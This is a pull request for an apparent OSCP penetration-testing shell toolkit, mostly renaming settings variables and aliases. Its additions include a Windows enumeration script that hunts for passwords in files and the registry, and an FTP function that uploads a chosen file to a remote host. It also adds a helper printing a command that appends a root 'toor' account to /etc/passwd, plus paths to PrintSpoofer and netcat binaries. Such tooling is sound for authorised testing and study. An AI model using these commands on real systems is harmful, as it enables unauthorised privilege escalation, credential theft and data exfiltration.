### PR TITLE
Release v1.1.0

### DIFF
--- a/example.settings.json
+++ b/example.settings.json
@@ -7,6 +7,7 @@
     "XFREERDP_WIDTH": 932,
     "FFUF_RECURSIVE_DEPTH": 1,
     "FFUF_DEFAULT_WORDLIST": "/home/kali/oscp-swiss/wordlist/ffuf-default.txt",
+    "FFUF_DEFAULT_DIRSEARCH": false,
     "FFUF_TRAVERSAL_DEFAULT_WORDLIST": "/home/kali/oscp-swiss/wordlist/file-traversal-default.txt",
     "GOBUSTER_SUBDOMAIN_VHOST_DEFAULT_WORDLIST": "/home/kali/oscp-swiss/wordlist/subdomain+vhost-default.txt",
     "SPAWN_SESSION_IN_WORKSPACE": false,

--- a/example.settings.json
+++ b/example.settings.json
@@ -12,7 +12,8 @@
     "SPAWN_SESSION_IN_WORKSPACE": false,
     "CEWL_MIN_WORD_LENGTH": 4,
     "APP_BANNER": true,
-    "CEWL_DEPTH": 2
+    "CEWL_DEPTH": 2,
+    "COLORFUL_CAT_COMMAND": false
   },
-  "APP_VERSION": "1.0.0"
+  "APP_VERSION": "1.0.1"
 }

--- a/example.settings.json
+++ b/example.settings.json
@@ -1,20 +1,47 @@
 {
-  "env": {
-    "WP_TOKEN": "",
-    "WORDLIST_BASE": "/usr/share/wordlists",
-    "DEFAULT_NETWORK_INTERFACE": "tun0",
-    "DISABLE_COLOR": false,
-    "XFREERDP_WIDTH": 932,
-    "FFUF_RECURSIVE_DEPTH": 1,
-    "FFUF_DEFAULT_WORDLIST": "/home/kali/oscp-swiss/wordlist/ffuf-default.txt",
-    "FFUF_DEFAULT_DIRSEARCH": false,
-    "FFUF_TRAVERSAL_DEFAULT_WORDLIST": "/home/kali/oscp-swiss/wordlist/file-traversal-default.txt",
-    "GOBUSTER_SUBDOMAIN_VHOST_DEFAULT_WORDLIST": "/home/kali/oscp-swiss/wordlist/subdomain+vhost-default.txt",
-    "SPAWN_SESSION_IN_WORKSPACE": false,
-    "CEWL_MIN_WORD_LENGTH": 4,
-    "APP_BANNER": true,
-    "CEWL_DEPTH": 2,
-    "COLORFUL_CAT_COMMAND": false
+  "global_settings": {
+    "app_version": "1.1.0",
+    "app_banner": true,
+    "default_network_interface": "tun0",
+    "disable_color": false,
+    "wordlist_base": "/home/kali/oscp-swiss/wordlist"
   },
-  "APP_VERSION": "1.0.1"
+  "functions": {
+    "wpscan": {
+      "token": ""
+    },
+    "xfreerdp": {
+      "default_width": 932
+    },
+    "ffuf_default": {
+      "recursive_depth": 1,
+      "wordlist": "/home/kali/oscp-swiss/wordlist/ffuf-default.txt",
+      "use_dirsearch": true
+    },
+    "ffuf_traversal_default": {
+      "wordlist": "/home/kali/oscp-swiss/wordlist/file-traversal-default.txt"
+    },
+    "cat": {
+      "use_pygmentize": false
+    },
+    "ls": {
+      "use_nnn": false
+    },
+    "get_web_keywords": {
+      "min_word_length": 4,
+      "depth": 2
+    },
+    "gobuster_subdomain_default": {
+      "wordlist": "/home/kali/oscp-swiss/wordlist/subdomain+vhost-default.txt"
+    },
+    "gobuster_vhost_default": {
+      "wordlist": "/home/kali/oscp-swiss/wordlist/subdomain+vhost-default.txt"
+    },
+    "spawn_session_in_workspace": {
+      "start_at_new_session": false
+    }
+  },
+  "swiss_variable": {
+
+  }
 }

--- a/script/alias.sh
+++ b/script/alias.sh
@@ -33,7 +33,7 @@ function cd() {
 #       2. set the resolution to your preferred screen resolution
 #       3. mount to the current directory
 alias _xfrredp="/usr/bin/xfreerdp"
-alias xfreerdp="override_cmd_banner; mkdir -p xfreerdp-data; xfreerdp /drive:$PWD,/xfreerdp-data /cert-ignore /w:$XFREERDP_WIDTH"
+alias xfreerdp="override_cmd_banner; mkdir -p xfreerdp-data; xfreerdp /drive:xfreerdp-data,$PWD/xfreerdp-data /cert-ignore /w:$XFREERDP_WIDTH"
 
 # Description:
 #   Replace the default argument of the command wpscan

--- a/script/alias.sh
+++ b/script/alias.sh
@@ -33,7 +33,7 @@ function cd() {
 #       2. set the resolution to your preferred screen resolution
 #       3. mount to the current directory
 alias _xfrredp="/usr/bin/xfreerdp"
-alias xfreerdp="override_cmd_banner; mkdir xfreerdp-data; xfreerdp /drive:$PWD,/xfreerdp-data /cert-ignore /w:$XFREERDP_WIDTH"
+alias xfreerdp="override_cmd_banner; mkdir -p xfreerdp-data; xfreerdp /drive:$PWD,/xfreerdp-data /cert-ignore /w:$XFREERDP_WIDTH"
 
 # Description:
 #   Replace the default argument of the command wpscan
@@ -49,8 +49,12 @@ alias wpscan="override_cmd_banner; wpscan --enumerate ap,at,u --plugins-detectio
 #   The default argument is to:
 #       1. display the content of the file with color under dark-mode Kali.
 # Reference: https://stackoverflow.com/questions/62546404/how-to-use-dracula-theme-as-a-style-in-pygments
+
 alias _cat="/usr/bin/cat"
-alias cat="override_cmd_banner; pygmentize -P style=dracula -g"
+
+if [ $COLORFUL_CAT_COMMAND = true ]; then
+    alias cat="override_cmd_banner; pygmentize -P style=dracula -g"
+fi
 
 ############
 # wordlist #
@@ -101,6 +105,7 @@ windows_path="/usr/share/windows-resources"
 windows_powercat='/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1'
 windows_powerup='/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1'
 windows_powerview='/usr/share/windows-resources/powersploit/Recon/PowerView.ps1'
+windows_nc64='/home/dex/oscp-swiss/utils/windows/nc64.exe'
 
 #########
 # linux #

--- a/script/alias.sh
+++ b/script/alias.sh
@@ -33,7 +33,7 @@ function cd() {
 #       2. set the resolution to your preferred screen resolution
 #       3. mount to the current directory
 alias _xfrredp="/usr/bin/xfreerdp"
-alias xfreerdp="override_cmd_banner; mkdir -p xfreerdp-data; xfreerdp /drive:xfreerdp-data,$PWD/xfreerdp-data /cert-ignore /w:$XFREERDP_WIDTH"
+alias xfreerdp="override_cmd_banner; mkdir -p xfreerdp-data; xfreerdp /drive:xfreerdp-data,$PWD/xfreerdp-data /cert-ignore /w:$_swiss_xfreerdp_default_width"
 
 # Description:
 #   Replace the default argument of the command wpscan
@@ -42,7 +42,7 @@ alias xfreerdp="override_cmd_banner; mkdir -p xfreerdp-data; xfreerdp /drive:xfr
 #       2. use aggressive plugin detection
 #       3. use the WPSCAN_API_TOKEN environment variable (optional)
 alias _wpscan="/usr/bin/wpscan"
-alias wpscan="override_cmd_banner; wpscan --enumerate ap,at,u --plugins-detection aggressive --api-token $WP_TOKEN"
+alias wpscan="override_cmd_banner; wpscan --enumerate ap,at,u --plugins-detection aggressive --api-token $_swiss_wpscan_token"
 
 # Description:
 #   Replace the default argument of the command cat
@@ -52,51 +52,57 @@ alias wpscan="override_cmd_banner; wpscan --enumerate ap,at,u --plugins-detectio
 
 alias _cat="/usr/bin/cat"
 
-if [ $COLORFUL_CAT_COMMAND = true ]; then
+if [ $_swiss_cat_use_pygmentize = true ]; then
     alias cat="override_cmd_banner; pygmentize -P style=dracula -g"
+fi
+
+alias _ls="ls"
+
+if [ $_swiss_ls_use_nnn = true ]; then
+    alias ls=" nnn -dEH"
 fi
 
 ############
 # wordlist #
 ############
-wordlist_path=$WORDLIST_BASE
+wordlist_path=$_swiss_wordlist_base
 custom_wordlist_path=$HOME/oscp-swiss/wordlist
 
 ### directory & files
-wordlist_dirsearch="$WORDLIST_BASE/seclists/Discovery/Web-Content/dirsearch.txt"
-wordlist_dirb_commn="$WORDLIST_BASE/dirb/common.txt"
-wordlist_raft_directory_big="$WORDLIST_BASE/seclists/Discovery/Web-Content/raft-large-directories.txt"
-wordlist_raft_file_big="$WORDLIST_BASE/seclists/Discovery/Web-Content/raft-large-files.txt"
+wordlist_dirsearch="$wordlist_path/seclists/Discovery/Web-Content/dirsearch.txt"
+wordlist_dirb_commn="$wordlist_path/dirb/common.txt"
+wordlist_raft_directory_big="$wordlist_path/seclists/Discovery/Web-Content/raft-large-directories.txt"
+wordlist_raft_file_big="$wordlist_path/seclists/Discovery/Web-Content/raft-large-files.txt"
 
 ### subdomain
-wordlist_subdomain_amass_small="$WORDLIST_BASE/amass/subdomains-top1mil-20000.txt"
-wordlist_subdomain_amass_big="$WORDLIST_BASE/amass/subdomains-top1mil-110000.txt"
-wordlist_subdomain_dirb="$WORDLIST_BASE/dirbuster/directory-list-2.3-medium.txt"
-wordlist_subdomain_top="$WORDLIST_BASE/Discovery/DNS/subdomains-top1million-110000.txt"
+wordlist_subdomain_amass_small="$wordlist_path/amass/subdomains-top1mil-20000.txt"
+wordlist_subdomain_amass_big="$wordlist_path/amass/subdomains-top1mil-110000.txt"
+wordlist_subdomain_dirb="$wordlist_path/dirbuster/directory-list-2.3-medium.txt"
+wordlist_subdomain_top="$wordlist_path/Discovery/DNS/subdomains-top1million-110000.txt"
 
 ### username & password
-wordlist_username_big="$WORDLIST_BASE/seclists/Usernames/xato-net-10-million-usernames.txt"
-wordlist_username_small="$WORDLIST_BASE/seclists/Usernames/top-usernames-shortlist.txt"
-wordlist_rockyou="$WORDLIST_BASE/rockyou.txt"
+wordlist_username_big="$wordlist_path/seclists/Usernames/xato-net-10-million-usernames.txt"
+wordlist_username_small="$wordlist_path/seclists/Usernames/top-usernames-shortlist.txt"
+wordlist_rockyou="$wordlist_path/rockyou.txt"
 wordlist_credential_small="$custom_wordlist_path/custom-default-credential-list.txt"
 
 # api
-wordlist_api_obj="$WORDLIST_BASE/seclists/Discovery/Web-Content/api/objects.txt"
-wordlist_api_res="$WORDLIST_BASE/seclists/Discovery/Web-Content/api/api-endpoints-res.txt"
+wordlist_api_obj="$wordlist_path/seclists/Discovery/Web-Content/api/objects.txt"
+wordlist_api_res="$wordlist_path/seclists/Discovery/Web-Content/api/api-endpoints-res.txt"
 
 ### specific
-wordlist_snmp_community_string="$WORDLIST_BASE/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt"
-wordlist_lfi="$WORDLIST_BASE/IntruderPayloads/FuzzLists/lfi.txt"
+wordlist_snmp_community_string="$wordlist_path/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt"
+wordlist_lfi="$wordlist_path/IntruderPayloads/FuzzLists/lfi.txt"
 
 ## hashcat
 wordlist_hashcat_rules="/usr/share/hashcat/rules"
 wordlist_hashcat_rule_best64="/usr/share/hashcat/rules/best64.rule"
 
 # sqli
-wordlist_sqli="$WORDLIST_BASE/custom-sqli.txt"
+wordlist_sqli="$wordlist_path/custom-sqli.txt"
 
 # traversal
-wordlist_traversal="$WORDLIST_BASE/IntruderPayloads/FuzzLists/traversal.txt"
+wordlist_traversal="$wordlist_path/IntruderPayloads/FuzzLists/traversal.txt"
 
 ###########
 # windows #

--- a/script/extension.sh
+++ b/script/extension.sh
@@ -21,3 +21,5 @@ rev_shell="$swiss_utils/rev"
 windows_sharphound='/usr/share/windows-resources/SharpHoundv2.4.1'
 windows_conpty="$swiss_utils/Invoke-ConPtyShell.ps1"
 ligolo_path="$swiss_utils/tunnel/ligolo-0.6.2"
+windows_printspoofer32='$HOME/oscp-swiss/utils/windows/PrintSpoofer32.exe'
+windows_printspoofer64='$HOME/oscp-swiss/utils/windows/PrintSpoofer64.exe'

--- a/script/installation.sh
+++ b/script/installation.sh
@@ -87,3 +87,6 @@ merge   /usr/share/wordlists/IntruderPayloads/FuzzLists/sqli-error-based.txt \
 ln -s /usr/share/windows-binaries $HOME/oscp-swiss/utils/windows
 ln -s /usr/share/windows-resources $HOME/oscp-swiss/utils/windows
 ln -s /usr/share/wordlists $HOME/oscp-swiss/wordlist
+
+# nnn installation
+# https://software.opensuse.org//download.html?project=home%3Astig124%3Annn&package=nnn

--- a/script/installation.sh
+++ b/script/installation.sh
@@ -13,7 +13,6 @@ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32s -P 
 wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 -P $base/pspy
 wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64s -P $base/pspy
 
-
 # Linpeas/Winpeas
 # REF: https://github.com/peass-ng/PEASS-ng/releases/tag/20240721-1e44f951
 mkdir $base/Peas
@@ -84,3 +83,7 @@ merge   /usr/share/wordlists/IntruderPayloads/FuzzLists/sqli-error-based.txt \
         '/usr/share/wordlists/PayloadsAllTheThings/SQL Injection/Intruder/payloads-sql-blind-MySQL-ORDER_BY' \
         '/usr/share/wordlists/PayloadsAllTheThings/SQL Injection/Intruder/payloads-sql-blind-MySQL-WHERE' \
         -o sqli-custom.txt
+
+ln -s /usr/share/windows-binaries $HOME/oscp-swiss/utils/windows
+ln -s /usr/share/windows-resources $HOME/oscp-swiss/utils/windows
+ln -s /usr/share/wordlists $HOME/oscp-swiss/wordlist

--- a/script/oscp-swiss.sh
+++ b/script/oscp-swiss.sh
@@ -22,11 +22,11 @@ function swiss() {
         logger info "|  ____/ /__ |/ |/ / __/ /  ____/ /____/ /   |"
         logger info "|  /____/ ____/|__/  /___/  /____/ /____/    |"
         logger info "|                                            |"
-        logger info "|  by @dextermallo v$APP_VERSION                    |"
+        logger info "|  by @dextermallo v$_swiss_app_version                    |"
         logger info "'--------------------------------------------'"
     }
 
-    if [ $APP_BANNER = true ]; then
+    if [ $_swiss_app_banner = true ]; then
         _banner
     fi
 
@@ -191,7 +191,7 @@ function svc() {
             logger info "[i] usage:"
             logger info "[i] (1) run ftp"
             logger info "[i] (2) run open <ip> 21"
-            logger info "[i] (2-2) Default Interface ($DEFAULT_NETWORK_INTERFACE) IP: $(get_default_network_interface_ip)"
+            logger info "[i] (2-2) Default Interface ($_swiss_default_network_interface) IP: $(get_default_network_interface_ip)"
             logger info "[i] (3) use username anonymous"
             logger info "[i] (4) binary # use binary mode"
             logger info "[i] (5) put <file-you-want-to-download>"
@@ -423,8 +423,8 @@ function ffuf_default() {
 
     _helper() {
         logger info "[i] Usage: ffuf_default [URL/FUZZ] (options)"
-        logger warn "[i] Recursive with depth = $FFUF_RECURSIVE_DEPTH"
-        logger warn "[i] Default wordlist: $FFUF_DEFAULT_WORDLIST"
+        logger warn "[i] Recursive with depth = $_swiss_ffuf_default_recursive_depth"
+        logger warn "[i] Default wordlist: $_swiss_ffuf_default_wordlist"
     }
 
     if [ $# -eq 0 ]; then
@@ -442,15 +442,15 @@ function ffuf_default() {
         logger info "[i] Creating directory $domain_dir ..."
         mkdir -p "$domain_dir"
 
-        if [[ -f "$FFUF_DEFAULT_WORDLIST.statistic" ]]; then
+        if [[ -f "$_swiss_ffuf_default_wordlist.statistic" ]]; then
             logger warn "[w] ====== Wordlist Statistic ======"
-            _cat $FFUF_DEFAULT_WORDLIST.statistic
+            _cat $_swiss_ffuf_default_wordlist.statistic
             logger warn "[w] ================================"
         fi
 
         local stripped_url="${url/FUZZ/}"
 
-        if [ $FFUF_DEFAULT_DIRSEARCH = true ]; then
+        if [ $_swiss_ffuf_default_use_dirsearch = true ]; then
             if check_cmd_exist dirsearch; then
                 logger info "[i] (Extension) dirsearch quick scan"
                 dirsearch -u $stripped_url
@@ -459,7 +459,7 @@ function ffuf_default() {
             fi
         fi
 
-        ffuf -w $FFUF_DEFAULT_WORDLIST -recursion -recursion-depth $FFUF_RECURSIVE_DEPTH -u ${@} | tee "$domain_dir/ffuf-default"
+        ffuf -w $_swiss_ffuf_default_wordlist -recursion -recursion-depth $_swiss_ffuf_default_recursive_depth -u ${@} | tee "$domain_dir/ffuf-default"
     fi
 }
 
@@ -485,13 +485,13 @@ function ffuf_traversal_default() {
         logger info "[i] Creating directory $domain_dir ..."
         mkdir -p "$domain_dir"
 
-        if [[ -f "$FFUF_TRAVERSAL_DEFAULT_WORDLIST.statistic" ]]; then
+        if [[ -f "$_swiss_ffuf_traversal_default_wordlist.statistic" ]]; then
             logger warn "[w] ====== Wordlist Statistic ======"
-            _cat $FFUF_TRAVERSAL_DEFAULT_WORDLIST.statistic
+            _cat $_swiss_ffuf_traversal_default_wordlist.statistic
             logger warn "[w] ================================"
         fi
 
-        ffuf -w $FFUF_TRAVERSAL_DEFAULT_WORDLIST -u ${@} | tee "$domain_dir/traversal-default"
+        ffuf -w $_swiss_ffuf_traversal_default_wordlist -u ${@} | tee "$domain_dir/traversal-default"
     fi
 }
 
@@ -516,13 +516,13 @@ function gobuster_subdomain_default() {
         logger info "[i] Creating directory $domain_dir ..."
         mkdir -p "$domain_dir"
 
-        if [[ -f "$GOBUSTER_SUBDOMAIN_VHOST_DEFAULT_WORDLIST.statistic" ]]; then
+        if [[ -f "$_swiss_gobuster_subdomain_default_wordlist.statistic" ]]; then
             logger warn "[w] ====== Wordlist Statistic ======"
-            _cat $GOBUSTER_SUBDOMAIN_VHOST_DEFAULT_WORDLIST.statistic
+            _cat $_swiss_gobuster_subdomain_default_wordlist.statistic
             logger warn "[w] ================================"
         fi
 
-        gobuster dns -w $GOBUSTER_SUBDOMAIN_VHOST_DEFAULT_WORDLIST -t 20 -o $domain_dir/subdomain-default -d ${@}
+        gobuster dns -w $_swiss_gobuster_subdomain_default_wordlist -t 20 -o $domain_dir/subdomain-default -d ${@}
     fi
 }
 
@@ -547,14 +547,14 @@ function gobuster_vhost_default() {
         logger info "[i] Creating directory $domain_dir ..."
         mkdir -p "$domain_dir"
 
-        if [[ -f "$GOBUSTER_SUBDOMAIN_VHOST_DEFAULT_WORDLIST.statistic" ]]; then
+        if [[ -f "$_swiss_gobuster_vhost_default_wordlist.statistic" ]]; then
             logger warn "[w] ====== Wordlist Statistic ======"
-            _cat $GOBUSTER_SUBDOMAIN_VHOST_DEFAULT_WORDLIST.statistic
+            _cat $_swiss_gobuster_vhost_default_wordlist.statistic
             logger warn "[w] ================================"
         fi
 
         gobuster vhost -k -u $ip --domain $domain --append-domain -r \
-                 -w $GOBUSTER_SUBDOMAIN_VHOST_DEFAULT_WORDLIST \
+                 -w $_swiss_gobuster_vhost_default_wordlist \
                  -o $domain_dir/vhost-default -t 64
     fi
 }
@@ -607,7 +607,7 @@ function get_web_pagelink() {
 # Usage: get_web_keywords <url>
 function get_web_keywords() {
     logger info "[i] Usage: get_web_keywords <url>"
-    cewl -d $CEWL_DEPTH -m $CEWL_MIN_WORD_LENGTH -w cewl-wordlist.txt $1
+    cewl -d $_swiss_get_web_keywords_depth -m $_swiss_get_web_keywords_min_word_length -w cewl-wordlist.txt $1
 }
 
 # Description: set the target IP address and set variable target
@@ -752,11 +752,11 @@ function go_workspace() {
 
 # Description:
 #   Spawn the new session in the workspace, and set target into the variables.
-#   The  function is configured by the environment variable SPAWN_SESSION_IN_WORKSPACE
+#   The  function is configured by the environment variable _swiss_spawn_session_in_workspace_start_at_new_session
 #   See settings.json for more details.
 # Usage: spawn_session_in_workspace
 function spawn_session_in_workspace() {
-    if [ "$SPAWN_SESSION_IN_WORKSPACE" = true ]; then
+    if [ "$_swiss_spawn_session_in_workspace_start_at_new_session" = true ]; then
         go_workspace
         target=$(g target)
     fi

--- a/script/target-enum-script.ps1
+++ b/script/target-enum-script.ps1
@@ -1,0 +1,106 @@
+function generate-report {
+
+    function run_cmd {
+        param (
+            [string]$cmd
+        )
+        
+        echo "### $cmd" >> report.md
+        echo "``````powershell" >> report.md
+        Invoke-Expression $cmd >> report.md 2>&1
+        echo "``````" >> report.md
+    }
+
+    echo "# OS & Arch" >> report.md
+
+    run_cmd "net config Workstation"
+    run_cmd "systeminfo | findstr /B /C:`"OS Name`" /C:`"OS Version`""
+    run_cmd "hostname"
+
+    echo "# User Info / Group memberships of Current User" >> report.md
+
+    echo "# Other Users & Groups" >> report.md
+    run_cmd "net users"
+    
+    echo "# Network" >> report.md
+    run_cmd "ipconfig /all"
+    run_cmd "route print"
+    run_cmd "arp -A"
+    run_cmd "netstat -ano"
+    run_cmd "netsh firewall show state"
+    run_cmd "netsh firewall show config"
+
+    echo "# Installed Applications" >> report.md
+    run_cmd "dir C:\'Program Files'"
+    run_cmd "dir C:\'Program Files (x86)'"
+
+    echo "# Running Process" >> report.md
+    run_cmd "tasklist /SVC"
+    run_cmd "schtasks /query /fo LIST /v"
+    run_cmd "net start"
+
+    echo "# Interesting Directory" >> report.md
+    run_cmd "dir C:\Users"
+    run_cmd "dir C:\Users\Public"
+    run_cmd "dir C:"
+
+    echo "# Interesting Files" >> report.md
+    run_cmd "dir /s *pass* == *cred* == *vnc* == *.config*"
+    run_cmd "findstr /si password *.xml *.ini *.txt"
+
+    echo "# Disk & Drivers" >> report.md
+    run_cmd "DRIVERQUERY"
+
+    echo "# Registry" >> report.md
+    run_cmd "reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated"
+    run_cmd "reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated"
+    run_cmd "reg query HKLM /f password /t REG_SZ /s"
+    run_cmd "reg query HKCU /f password /t REG_SZ /s"
+
+    echo "# Disc" >> report.md    
+
+
+    echo "REPORT COMPLETE!"
+}
+
+function ftp-download {
+    param (
+        [string]$host_ip,
+        [string]$file_path,
+        [switch]$h
+    )
+
+    # If -h is passed, display the usage instructions
+    if ($h) {
+        Write-Host "Usage: download -host_ip <FTP_HOST> -file_path <FILE_PATH>"
+        Write-Host 'Example: download -host_ip "10.10.10.1" -file_path "C:\path\to\your\file.txt"'
+        return
+    }
+
+    # Check if both host and file_path are provided
+    if (-not $host_ip -or -not $file_path) {
+        Write-Host "Error: Both -host_ip and -file_path parameters are required."
+        Write-Host 'Run download -h for help.'
+        return
+    }
+
+    # Generate the ftp_script.txt with necessary FTP commands
+    $ftpScriptContent = @"
+open $host_ip 21
+anonymous
+anonymous
+binary
+put $file_path
+quit
+"@
+
+    # Write the content to ftp_script.txt
+    $scriptFilePath = "ftp_script.txt"
+    $ftpScriptContent | Set-Content -Path $scriptFilePath
+
+    # Run the FTP script
+    ftp -s:$scriptFilePath
+
+    # Delete the ftp_script.txt file after running
+    Remove-Item -Path $scriptFilePath -Force
+}

--- a/script/target-enum-script.sh
+++ b/script/target-enum-script.sh
@@ -303,4 +303,10 @@ function check() {
     esac
 }
 
+new_user() {
+    log --bold -f green "[i] copy to add an user and sign-in toor:password"
+    hash=$(openssl passwd -1 "password")
+    echo "echo 'toor:$hash:0:0:root:/root:/bin/bash' >> /etc/passwd"
+}
+
 clear

--- a/script/target-enum-script.sh
+++ b/script/target-enum-script.sh
@@ -102,7 +102,7 @@ function check() {
         2|su)
             clear 2>/dev/null
             log --bold -f red "=== Easy Su===\n"
-            log --bold -f yellow "[i] manual test for 'sudo -l' and 'su - root'"
+            log --bold -f yellow "[i] manual test for 'sudo -l', 'su - root', and/or 'sudo su'"
 
             # Disabled
             # printf "\n[i] check if brute-focrable\n"
@@ -226,7 +226,7 @@ function check() {
             clear 2>/dev/null
             log --bold -f red "=== Interesting filename under the current directory ===\n"
             ignore_list=("./usr/src/*" "./var/lib/*" "./etc/*" "./usr/share/*" "./snap/*" "./sys/*" "./usr/lib/*" "./usr/bin/*" "./run/*" "./boot/*" "./usr/sbin/*" "./proc/*" "./var/snap/*")
-            search_items=("*.txt" "*.sqlite" "*conf*" "*data*" "*.pdf" "*.apk" "*.cfg" "*.json" "*.ini" "*.log" "*.sh" "*password*" "*cred*" "*.env" "config" "HEAD" "*mbox")
+            search_items=("*.txt" "*.sqlite" "*conf*" "*data*" "*.pdf" "*.apk" "*.cfg" "*.json" "*.ini" "*.log" "*.sh" "*password*" "*cred*" "*.env" "config" "HEAD" "*mbox" "*.sdf")
 
             find_command="find . -type f"
 

--- a/script/utils.sh
+++ b/script/utils.sh
@@ -223,3 +223,13 @@ load_settings() {
     APP_VERSION=$(jq -r '.APP_VERSION' "$settings_file")
     export "APP_VERSION"="$APP_VERSION"
 }
+
+# TODO: doc
+check_cmd_exist() {
+    if command -v "$1" &> /dev/null
+    then
+        return 0
+    else
+        return 1
+  fi
+}


### PR DESCRIPTION
## Feat
- now `ffuf_default` can run `dirsearch` as a pre-check.
- add a function `make_variable` to quickly add a variable into alias.sh
- add a function `cheatsheet` to print frequent used doc. Now support `cheatsheet <tty>`
- add a function `rev_shell` which will fetch the rev shell content from https://revshell.com
- add functions `url_encode` and `url_decode` for faster processing.
- add a function `msfsearch` to search based on metasploit. Similar with `searchsploit`.
- Add a `target-enum-script.ps1` for Windows enum (WIP)
- Add file check for *.sdf in `target-enum-script.sh`
- Add function `new_user` in `target-enum-script.sh` to generate PE payloads using new users

## Optimization
- Restructure environment variables in `settings.json` to add readability.
- command `cat` replaced by `pygmentize` are now optional.
- change the default path for `ship -t windows` from `%TEMP%` to `C:\ProgramData`
- `show_utils` are renamed to `list_utils` for naming convention.
- now `show_utils` are starting from the base of `oscp_wsiss/utils`. You can use `show_utils <related-path>` to query under the utils.

## Fixes
- `xfreerdp` now will mount to the current directory instead of the access from the root directory.
- `svc ftp` are now start with 21 port.
- fix an issue when `ship -t windows`, the path will render incorrectly.
- fix an issue in `ffuf_default` that does not print the statistic.